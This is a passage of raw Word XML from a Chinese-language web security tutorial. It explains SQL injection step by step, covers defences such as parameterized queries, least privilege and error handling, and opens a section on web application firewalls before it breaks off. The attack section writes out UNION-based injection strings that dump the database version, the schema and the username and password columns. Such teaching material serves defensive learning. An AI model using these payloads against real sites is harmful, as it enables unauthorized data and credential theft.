                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>PHP/Python/Node.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="4C4303EE" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1310" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6DE7FC4A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数据库驱动</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="77C6978B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连接数据库的桥梁</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="18B0A8A8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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>PDO(php)/JDBC(Java)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="49B457E2" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1310" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="41FAA591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数据库服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47AE78ED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存储和管理数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0B62005B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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>MySQL/Oracle/SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="269C551E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567A1579" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249697ED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攻击原理（分步说明）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F3830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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>寻找注入点：在输入框尝试输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B6227" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若页面报错（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法错误），说明存在漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D614E68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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测数据库类型：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0909B643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>&lt;SQL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1F0F2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>' UNION SELECT null, version() --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A54E20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返回数据库版本（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL/Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B31623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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取数据结构：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6527DE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>&lt;SQL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB71963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 xml:space="preserve">' UNION SELECT table_name, column_name </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E55A51C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>FROM information_schema.columns --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ABFB36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查询所有表名和列名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED130DD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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>窃取敏感数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4C7DDA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>&lt;SQL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7384FFCA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 xml:space="preserve">' UNION SELECT username, password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5055E24A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>FROM users --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D71F1B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获取所有用户凭证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD109B4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严重危害：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6E0F64" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据泄露：获取用户密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个人信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>商业机密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B51305F" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据篡改：修改商品价格</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除关键数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B9531A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限提升：获取管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B5D4D4" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器沦陷：通过数据库执行系统命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB28E54" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>法律风险：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GDPR</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>违规罚款可达</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2000</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>万欧元</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430AE0AA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>注入防御方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1359C3C9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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参数化查询（最有效方法）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B8AA51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>&lt;PYTHON&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486ADD63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># Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>安全示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBF176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>cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, password))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332B152F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原理：将用户输入作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而非</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D87355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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>输入验证与过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD53C2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>&lt;PHP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812DEB7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 xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>只允许字母数字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F6F6E3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>if(!preg_match('/^[a-zA-Z0-9]+$/', $input)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A253A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 xml:space="preserve">    die("</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>非法输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5222F5D7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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E15CB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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>最小权限原则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D6DAAC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>&lt;SQL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478FCEBA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 xml:space="preserve">CREATE USER 'web_user'@'localhost' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FA9207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>IDENTIFIED BY 'strong_password';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C11C4B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>GRANT SELECT ON shop.products TO 'web_user';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38672590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数据库账户仅赋予必要权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6818E79E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 xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>安全框架使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A7E3A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Hibernate / MyBatis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C494B23" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Laravel Eloquent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D47647" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django ORM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCA3F3C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 xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>错误处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E8B88B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>&lt;PHP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC6B82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 xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>不要显示详细错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B55137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 xml:space="preserve">ini_set('display_errors', '0'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF96F8B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 xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>记录到安全日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238E2B1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lastRenderedPageBreak/>
        <w:t>error_log("Database error", 3, "/secure/path/log.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D66CF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>防火墙详解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593DEA1D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什么是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374B4F59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Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用防火墙（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是专门保护</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用的安全设备</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务，位于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器前，过滤恶意流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2FE9FD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工作原理（三层过滤）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3074E3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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特征检测：匹配已知攻击模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A010A78" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DROP TABLE </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等关键词</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB8DEA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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为分析：识别异常访问模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11800847" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同一</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
